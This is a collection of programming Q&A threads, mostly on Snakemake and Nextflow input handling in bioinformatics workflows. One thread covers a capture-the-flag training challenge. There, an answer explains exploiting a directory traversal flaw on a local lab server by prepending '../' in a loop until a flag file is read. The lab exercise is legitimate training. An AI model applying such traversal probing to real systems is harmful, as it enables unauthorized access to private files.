Snakemake: Generic input function for different file locations - snakemake

I have two locations where my huge data can be stored: /data and /work.
/data is the folder where (intermediate) results are moved to after quality control. It is mounted read-only for the standard user.
/work is the folder where new results are written to. Obviously, it is writable.
I do not want to copy or link data from /data to /work.
So I run Snakemake from within the /work folder and want my input function to first check whether the required file exists in /data (and, if so, return the absolute /data path), and otherwise return the relative path in the /work directory.
import os
from snakemake.io import apply_wildcards

def in_func(wildcards):
    file_path = apply_wildcards('{id}/{visit}/{id}_{visit}-file_name_1.txt', wildcards)
    full_storage_path = os.path.join('/data', file_path)
    if os.path.isfile(full_storage_path):
        file_path = full_storage_path
    return {'myfile': file_path}

rule do_something:
    input:
        unpack(in_func),
        params = '{id}/{visit}/{id}_{visit}_params.txt',
This works fine, but I would have to define separate input functions for every rule because the file names differ. Is it possible to write a generic input function that takes as input the file name, e.g. {id}/{visit}/{id}_{visit}-file_name_1.txt, and the wildcards?
I also tried something like
def in_func(file_path):
    full_storage_path = os.path.join('/data', file_path)
    if os.path.isfile(full_storage_path):
        file_path = full_storage_path
    return file_path

rule do_something:
    input:
        myfile = in_func('{id}/{visit}/{id}_{visit}-file_name_1.txt'),
        params = '{id}/{visit}/{id}_{visit}_params.txt',
But then I do not have access to the wildcards in in_func(), do I?
Thanks,
Jan

You could use something like this:
import os

def handle_storage(pattern):
    def handle_wildcards(wildcards):
        f = pattern.format(**wildcards)
        f_data = os.path.join("/data", f)
        if os.path.exists(f_data):
            return f_data
        return f
    return handle_wildcards

rule do_something:
    input:
        myfile = handle_storage('{id}/{visit}/{id}_{visit}-file_name_1.txt'),
        params = '{id}/{visit}/{id}_{visit}_params.txt',
In other words, handle_storage returns a reference to the inner handle_wildcards function, a closure tailored to the particular pattern. Snakemake then applies that function automatically once the wildcard values are known. Inside the function, we first format the pattern with the wildcards and then check whether the resulting file exists in /data.
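To see what the closure does once concrete wildcard values arrive, here is a minimal sketch (the sample values are made up; a plain dict stands in for the wildcards object Snakemake would pass):

resolve = handle_storage('{id}/{visit}/{id}_{visit}-file_name_1.txt')

# Snakemake calls resolve(wildcards) once {id} and {visit} are known;
# a plain dict behaves the same way for a quick test:
print(resolve({'id': 'P01', 'visit': 'V1'}))
# -> '/data/P01/V1/P01_V1-file_name_1.txt' if that file exists,
#    otherwise the relative path 'P01/V1/P01_V1-file_name_1.txt'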

Related

Nextflow input how to declare tuple in tuple

I am working with a nextflow workflow that, at a certain stage, groups a series of files by their sample id using groupTuple(), resulting in a channel that looks like this:
[sample_id, [file_A, file_B, ... , file_N]]
[sample_id, [file_A, file_B, ... , file_N]]
...
[sample_id, [file_A, file_B, ... , file_N]]
Note that this is the same channel structure that you get from .fromFilePairs().
I want to use these channel items in a process in such a way that, for each item, the process reads the sample_id from the first field and all the files from the inner tuple at once.
The nextflow documentation is somewhat cryptic about this, and it is hard to find how to declare this type of input in a channel, so I thought I'd create a question on stack overflow and then answer it myself for anyone who will ever be looking for this answer.
How does one declare the inner tuple in the input section of a nextflow process?
In the example given above, my inner tuple contains items of only one type (files). I can therefore pass the whole second term of the tuple (i.e. the inner tuple) as a single input item under the file() qualifier. Like this:
input:
    tuple \
        val(sample_id), \
        file(inner_tuple) \
        from Input_channel
This will ensure that the tuple content is read as files (one by one), the same way as performing .collect() on a channel of files, in the sense that all files will then be available in the Nextflow temp directory where the process is executed.
The question is how you come up with sample_id, but in case they just have different file extensions you might use something like this:
all_files = Channel.fromPath("/path/to/your/files/*")
all_files.map { it -> [it.simpleName, it] }
    .groupTuple()
    .set { grouped_files }
The path qualifier (previously the file qualifier) can be used to stage a single (file) value or a collection of (file) values into the process execution directory. The note at the bottom of the multiple input files section in the docs also mentions:
The normal file input constructs introduced in the input of files
section are valid for collections of multiple files as well.
This means, you can use a script variable, e.g.:
input:
    tuple val(sample_id), path(my_files)
In which case, the variable will hold the list of files (preserving the original filenames). You could use it directly to refer to all of the files in the list, or, you could access specific (file) elements (if you need them) using square bracket (slice) notation.
This is the syntax you will want most of the time. However, if you need predictable filenames or if you need to deal with files with identical filenames, you may need a different approach:
Alternatively, you could specify a target filename, e.g.:
input:
    tuple val(sample_id), path('my_file')
In the case where a single file is received by the process, the file would be staged with the target filename. However, when a collection of files is received by the process, the filename will be appended with a numerical suffix representing its ordinal position in the list. For example:
process test {

    tag { sample_id }
    debug true
    stageInMode 'rellink'

    input:
    tuple val(sample_id), path('fastq')

    """
    echo "${sample_id}:"
    ls -g --time-style=+"" fastq*
    """
}
workflow {
    readgroups = Channel.fromFilePairs( '*_{1,2}.fastq' )
    test( readgroups )
}
Results:
$ touch {foo,bar,baz}_{1,2}.fastq
$ nextflow run .
N E X T F L O W ~ version 22.04.4
Launching `./main.nf` [scruffy_caravaggio] DSL2 - revision: 87a80d6d50
executor > local (3)
[65/66f860] process > test (bar) [100%] 3 of 3 ✔
baz:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../baz_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../baz_2.fastq
foo:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../foo_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../foo_2.fastq
bar:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../bar_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../bar_2.fastq
Note that the names of staged files can be controlled using the * and ? wildcards. See the links above for a table that shows how the wildcards are replaced depending on the cardinality of the input collection.

Nextflow: how do you pass an output (multiple files) from the publishdir to the next process?

I have a process generating two files that I am interested in, hitsort.cls and contigs.fasta.
I output these using publishdir:
process RUN_RE {

    publishDir "$baseDir/RE_output", mode: 'copy'

    input:
    file 'interleaved.fq'

    output:
    file "${params.RE_run}/seqclust/clustering/hitsort.cls"
    file "${params.RE_run}/contigs.fasta"

    script:
    """
    some_code
    """
}
Now, I need these two files to be an input for another process but I don't know how to do that.
I have tried calling this process with
NEXT_PROCESS(params.hitsort, params.contigs)
while specifying the input as:
process NEXT_PROCESS {

    input:
    path hitsort
    path contigs
but it's not working, because only the basename is used instead of the full path. Basically what I want is to wait for RUN_RE to finish, and then use the two files it outputs for the next process.
Best to avoid accessing files in the publishDir, since:
Files are copied into the specified directory in an asynchronous manner, thus they may not be immediately available in the published directory at the end of the process execution. For this reason files published by a process must not be accessed by other downstream processes.
The recommendation is therefore to ensure your processes only access files in the working directory (i.e. ./work). What this means is: it's best to avoid things like absolute paths in your input and output declarations. This will also help ensure your workflows are portable.
nextflow.enable.dsl=2

params.interleaved_fq = './path/to/interleaved.fq'
params.publish_dir = './results'

process RUN_RE {

    publishDir "${params.publish_dir}/RE_output", mode: 'copy'

    input:
    path interleaved

    output:
    path "./seqclust/clustering/hitsort.cls", emit: hitsort_cls
    path "./contigs.fasta", emit: contigs_fasta

    """
    # do something with ${interleaved}...
    ls -l "${interleaved}"

    # create some outputs...
    mkdir -p ./seqclust/clustering
    touch ./seqclust/clustering/hitsort.cls
    touch ./contigs.fasta
    """
}
process NEXT_PROCESS {

    input:
    path hitsort
    path contigs

    """
    ls -l
    """
}
workflow {
    interleaved_fq = file( params.interleaved_fq )
    NEXT_PROCESS( RUN_RE( interleaved_fq ) )
}
The above workflow block is effectively the same as:
workflow {
    interleaved_fq = file( params.interleaved_fq )
    RUN_RE( interleaved_fq )
    NEXT_PROCESS( RUN_RE.out.hitsort_cls, RUN_RE.out.contigs_fasta )
}

Traverse directory at URL to root in Python

How can you traverse a directory to get to the root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:
#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search

import urllib.request
import os

req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"

def getListOfFiles(dirName):
    listOfFile = os.listdir(dirName)
    allFiles = list()
    for entry in listOfFile:
        # Create full path
        fullPath = os.path.join(dirName, entry)
        if os.path.isdir(fullPath):
            allFiles = allFiles + getListOfFiles(fullPath)
        else:
            allFiles.append(fullPath)
    return allFiles

listOfFiles = getListOfFiles(dirName)
print(listOfFiles)

for file in listOfFiles:
    if file.endswith(".conf"):
        f = open(file, "r")
        print(f.read())
This outputs:
/tmp/level-0/level-1/level-2/human.conf
User : Human 66
Flag: Not-Set (Must be Root Human)
However, if I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf' it gives me the output:
User : Human 66
Flag: Not-Set (Must be Root Human)
User : Root Human
Flag: Well done the flag is: {}
The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing the directory?
It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL?
Thanks!
cyber discovery moon base challenge?
For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf'), which becomes your URL. You then need to request this URL (using urllib.request.urlopen(URL)).
The main part of the challenge is to prepend the ../ multiple times, which is not very hard with a simple loop. You don't need to use the os module.
Make sure to break the loop once you find the flag (or it will go into an infinite loop and give you errors).
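A minimal sketch of that loop; the depth limit and the "Well done" substring check are assumptions based on the output shown in the question:

import urllib.request

base = "http://127.0.0.1:8082/humantechconfig?file="
for depth in range(1, 20):                         # try increasing levels of traversal
    url = base + "../" * depth + "human.conf"
    body = urllib.request.urlopen(url).read().decode()
    print(f"depth {depth}:\n{body}")
    if "Well done" in body:                        # stop once the flag line appears
        break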

Snakemake variable number of files

I'm in a situation where I would like to scatter my workflow into a variable number of chunks, which I don't know beforehand. Maybe it is easiest to explain the problem by being concrete:
Someone has handed me FASTQ files demultiplexed using bcl2fastq with the no-lane-splitting option. I would like to split these files according to lane, map each lane individually, and then finally gather everything again. However, I don't know the number of lanes beforehand.
Ideally, I would like a solution like this,
rule split_fastq_file: (...) # results in N FASTQ files
rule map_fastq_file: (...) # do this N times
rule merge_bam_files: (...) # merge the N BAM files
but I am not sure this is possible. The expand function requires me to know the number of lanes, and I can't see how it would be possible to use wildcards for this, either.
I should say that I am rather new to Snakemake, and that I may have completely misunderstood how Snakemake works. It has taken me some time to get used to thinking about things "upside-down" by focusing on output files and then working backwards.
One option is to use a checkpoint when splitting the fastqs, so that you can dynamically re-evaluate the DAG at a later point to get the resulting lanes.
Here's an MWE step by step:
Set up and make an example fastq file.
# Requires Python 3.6+ for f-strings, Snakemake 5.4+ for checkpoints
import pathlib
import random

random.seed(1)

rule make_fastq:
    output:
        fastq = touch("input/{sample}.fastq")
Create a random number of lanes between 1 and 9, each with a random identifier from 1 to 9. Note that we declare this as a checkpoint, rather than a rule, so that we can later access the result. Also, we declare the output here as a directory specific to the sample, so that we can later glob in it to get the lanes that were created.
checkpoint split_fastq:
    input:
        fastq = rules.make_fastq.output.fastq
    output:
        lane_dir = directory("temp/split_fastq/{sample}")
    run:
        pathlib.Path(output.lane_dir).mkdir(exist_ok=True)
        n_lanes = random.randrange(1, 10)
        lane_numbers = random.sample(range(1, 10), k=n_lanes)
        for lane_number in lane_numbers:
            path = pathlib.Path(output.lane_dir) / f"L00{lane_number}.fastq"
            path.touch()
Do some intermediate processing.
rule map_fastq:
    input:
        fastq = "temp/split_fastq/{sample}/L00{lane_number}.fastq"
    output:
        bam = "temp/map_fastq/{sample}/L00{lane_number}.bam"
    run:
        bam = pathlib.Path(output.bam)
        bam.parent.mkdir(exist_ok=True)
        bam.touch()
To merge all the processed files, we use an input function to access the lanes that were created in split_fastq, so that we can do a dynamic expand on these. We do the expand on the last rule in the chain of intermediate processing steps, in this case map_fastq, so that we ask for the correct inputs.
def get_bams(wildcards):
    lane_dir = checkpoints.split_fastq.get(**wildcards).output[0]
    lane_numbers = glob_wildcards(f"{lane_dir}/L00{{lane_number}}.fastq").lane_number
    bams = expand(rules.map_fastq.output.bam, **wildcards, lane_number=lane_numbers)
    return bams
This input function now gives us easy access to the bam files we wish to merge, however many there are, and whatever they may be called.
rule merge_bam:
    input:
        get_bams
    output:
        bam = "temp/merge_bam/{sample}.bam"
    shell:
        "cat {input} > {output.bam}"
This example runs, and with random.seed(1) it happens to create three lanes (L001, L002, and L005).
If you don't want to use checkpoint, I think you could achieve something similar by creating an input function for merge_bam that opens up the original input fastq, scans the read names for lane info, and predicts what the input files ought to be. This seems less robust, however.
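For reference, a rough, hypothetical sketch of what that checkpoint-free input function could look like; it assumes Illumina-style read names where the lane is the fourth colon-separated field, plus the file layout used in the example above:

def get_bams_without_checkpoint(wildcards):
    # Derive the lane numbers by scanning the read headers of the original FASTQ
    # instead of using a checkpoint (assumes @instrument:run:flowcell:LANE:... names).
    lanes = set()
    with open(f"input/{wildcards.sample}.fastq") as fq:
        for i, line in enumerate(fq):
            if i % 4 == 0:  # FASTQ header lines
                lanes.add(line.split(":")[3])
    return expand("temp/map_fastq/{sample}/L00{lane_number}.bam",
                  sample=wildcards.sample, lane_number=sorted(lanes))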

Missing wildcards in S4 snakemake Object in R

I'm running a workflow with a main Snakefile that includes rules from the rules folder and calls R scripts from those included rules.
Here are a few lines and their specific files:
Snakefile:
samples = pd.read_table("samples.csv", header=0, sep=',', index_col=0)

rule extract:
    input:
        'summary/umi_expression_matrix.tsv'

include: "rules/extract_expression_single.smk"
rules/extract_expression_single.smk:
rule merge_umi:
    input:
        expand('summary/{sample}_umi_expression_matrix.tsv', sample=samples.index)
    output:
        'summary/umi_expression_matrix.tsv'
    script:
        "../scripts/merge_counts_single.R"
scripts/merge_counts_single.R:
samples = read.csv('samples.csv', header=TRUE, stringsAsFactors=FALSE)$samples
read_list = c()
for (i in 1:length(samples)){
    temp_matrix = read.table(snakemake@input[[i]][1], header=T, stringsAsFactors = F)
    cell_barcodes = colnames(temp_matrix)[-1]
    colnames(temp_matrix) = c("GENE", paste(samples[i], cell_barcodes, sep = "_"))
    read_list = c(read_list, list(temp_matrix))
}

# Little function that allows to merge unequal matrices
merge.all <- function(x, y) {
    merge(x, y, all=TRUE, by="GENE")
}

read_counts <- Reduce(merge.all, read_list)
read_counts[is.na(read_counts)] = 0
rownames(read_counts) = read_counts[,1]
read_counts = read_counts[,-1]
write.table(read_counts, file=snakemake@output[[1]], sep='\t')
The "clean" way to do it would be to call snakemake#wildcard.sample to attribute sample names to the script. But for some reason snakemake#wildcards is an empty vector.
In python:
print(type(snakemake.wildcards))
print(snakemake.wildcards)
print('done')
gives:
<class 'snakemake.io.Wildcards'>
done
which means it's also empty.
So right now I have to rely on going back to the samples.csv file and getting the sample names there. I will also have to double-check that the indexes match, maybe using greps, since I don't want the samples and the files to get mixed up.
Any idea why this is happening?
Update:
I've tried adding the sample_name as params to see if this would work and it actually does.
rule merge_umi:
    input:
        expand('summary/{sample}_umi_expression_matrix.tsv', sample=samples.index)
    params:
        sample_name = lambda wildcards: samples.index
    output:
        'summary/umi_expression_matrix.tsv'
    script:
        "../scripts/merge_counts_single.R"
I'm gonna use this for now, but my guess is there is still an issue with the scope of wildcards in included rules. Or maybe I'm doing it wrong.
The idea of using wildcards is to invoke a rule once for each value of the wildcards. If you use the expand function in the input of a rule, then that rule takes all of the wildcard values and creates a list of strings, which means the rule is invoked just once (not once per wildcard value). By default, expand uses the Python itertools function product, which yields all combinations of the provided wildcard values.
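For illustration, with made-up values (the ordering follows itertools.product):

expand('summary/{sample}_L00{lane}.tsv', sample=['A', 'B'], lane=[1, 2])
# -> ['summary/A_L001.tsv', 'summary/A_L002.tsv',
#     'summary/B_L001.tsv', 'summary/B_L002.tsv']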
Because of this, you can no longer use that wildcard inside your rule: when the rule is invoked, it receives all of the wildcard values converted into a single list, which is handed to your R script once (not once per wildcard value).
In your case, using wildcards is therefore not suitable, since your merge_umi rule runs only once (not once per wildcard value).
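To make the contrast concrete, here is a minimal hypothetical sketch (the per-sample rule and its script name are made up): a rule that is invoked once per sample does carry the sample wildcard into its script, while the aggregating rule built with expand does not.

rule process_one:
    input:
        'summary/{sample}_umi_expression_matrix.tsv'
    output:
        'per_sample/{sample}_processed.tsv'
    # invoked once per sample; snakemake@wildcards$sample is available in the R script
    script:
        "../scripts/process_one.R"

rule merge_umi:
    input:
        expand('summary/{sample}_umi_expression_matrix.tsv', sample=samples.index)
    output:
        'summary/umi_expression_matrix.tsv'
    # invoked exactly once; no wildcards reach the R script, hence the params workaround above
    script:
        "../scripts/merge_counts_single.R"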